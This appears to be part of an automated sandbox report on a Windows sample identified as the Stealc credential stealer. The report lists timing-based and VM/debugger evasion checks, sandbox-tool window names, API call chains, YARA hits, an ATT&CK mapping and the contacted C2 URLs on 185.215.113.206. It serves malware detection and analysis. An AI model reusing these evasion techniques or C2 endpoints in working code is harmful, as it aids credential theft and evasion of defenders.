                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA3EC second address: 9DA409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F228CBCA0B9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA409 second address: 9DA40D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1336 second address: 9E133A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2E98 second address: 9E2E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2FE8 second address: 9E3005 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F228CBCA0B3h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F0353 second address: 9F035C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F035C second address: 9F0360 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F0360 second address: 9F038B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F228D5156D5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F228D5156CDh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A00FAA second address: A00FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F228CBCA0ACh 0x0000000b ja 00007F228CBCA0A6h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jnl 00007F228CBCA0A6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A00FC6 second address: A00FDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F228D5156C6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d jc 00007F228D5156CEh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A00FDB second address: A00FE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A00FE1 second address: A00FE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A00FE6 second address: A00FEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A00FEC second address: A00FFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 je 00007F228D5156C6h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A00CC4 second address: A00CFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F228CBCA0ADh 0x00000008 jmp 00007F228CBCA0B6h 0x0000000d jno 00007F228CBCA0A6h 0x00000013 jng 00007F228CBCA0A6h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10620 second address: A10632 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F228D5156D8h 0x0000000a jp 00007F228D5156D2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10AE9 second address: A10AEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10DE1 second address: A10DF7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F228D5156CAh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10F48 second address: A10F4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A110A1 second address: A110AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11369 second address: A11374 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 ja 00007F228CBCA0A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A12D13 second address: A12D31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F228D5156D7h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A157A0 second address: A157AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F228CBCA0AAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A157AE second address: A157B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A157B2 second address: A157BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A15989 second address: A1598F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A17745 second address: A17766 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F228CBCA0B9h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD02C9 second address: 4CD02D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F228D5156CCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD02D9 second address: 4CD02FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F228CBCA0B8h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD02FE second address: 4CD0302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0302 second address: 4CD0308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0308 second address: 4CD0337 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F228D5156CCh 0x00000008 mov ah, CEh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F228D5156D8h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0337 second address: 4CD036F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F228CBCA0ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F228CBCA0B6h 0x00000010 pop ebp 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 call 00007F228CBCA0ACh 0x00000019 pop esi 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 930A4B second address: 930A4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 921801 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 91FF4B instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 92C8BD instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9B5CD2 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005338B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_005338B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00534910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00534910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0052DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0052E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00534570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00534570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0052ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0052BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0052DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005216D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005216D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0052F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00533EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00533EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00521160 GetSystemInfo,ExitProcess,0_2_00521160
                Source: file.exe, file.exe, 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1768903421.0000000000EFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware!.
                Source: file.exe, 00000000.00000002.1768903421.0000000000EFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1768903421.0000000000F45000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1768903421.0000000000F72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13210
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13207
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13229
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13221
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13261
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005245C0 VirtualProtect ?,00000004,00000100,000000000_2_005245C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00539860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00539860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00539750 mov eax, dword ptr fs:[00000030h]0_2_00539750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00537850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00537850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7284, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00539600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00539600
                Source: file.exe, file.exe, 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00537B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00536920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00536920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00537850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00537850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00537A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00537A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.520000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1723267854.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1768903421.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7284, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.520000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1723267854.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1768903421.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7284, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/true
                  		unknown
                  http://185.215.113.206/e2b1563c6670f193.phptrue
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/e2b1563c6670f193.php-file.exe, 00000000.00000002.1768903421.0000000000F56000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.206/e2b1563c6670f193.php/file.exe, 00000000.00000002.1768903421.0000000000F56000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://185.215.113.206/e2b1563c6670f193.php9file.exe, 00000000.00000002.1768903421.0000000000F56000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.206/e2b1563c6670f193.phpYfile.exe, 00000000.00000002.1768903421.0000000000F56000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://185.215.113.206/e2b1563c6670f193.php/4file.exe, 00000000.00000002.1768903421.0000000000F56000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://185.215.113.206/e2b1563c6670f193.php:file.exe, 00000000.00000002.1768903421.0000000000F56000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://185.215.113.206file.exe, 00000000.00000002.1768903421.0000000000EFE000.00000004.00000020.00020000.00000000.sdmptrue
                                  		unknown
                                  http://185.215.113.206Yfile.exe, 00000000.00000002.1768903421.0000000000EFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    185.215.113.206
                                    		unknownPortugal
                                    		206894WHOLESALECONNECTIONSNLtrue

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1542970
                                    Start date and time:2024-10-27 01:46:08 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 3m 5s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:1
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:file.exe
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@1/0@0/1
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 80%
                                    • Number of executed functions: 19
                                    • Number of non-executed functions: 82
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Stop behavior analysis, all processes terminated

                                    Warnings

                                    • VT rate limit hit for: file.exe

                                    Simulations

                                    Behavior and APIs

                                    No simulations

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    185.215.113.206file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206/e2b1563c6670f193.php
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206/e2b1563c6670f193.php
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206/e2b1563c6670f193.php
                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                    • 185.215.113.206/e2b1563c6670f193.php
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206/e2b1563c6670f193.php
                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                    • 185.215.113.206/e2b1563c6670f193.php
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206/e2b1563c6670f193.php
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206/e2b1563c6670f193.php
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206/
                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                    • 185.215.113.206/e2b1563c6670f193.php

                                    Domains

                                    No context

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206
                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                    • 185.215.113.206
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.16
                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                    • 185.215.113.16
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.16
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206
                                    uLV6jN2BWh.dllGet hashmaliciousUnknownBrowse
                                    • 185.215.113.217

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    No created / dropped files found

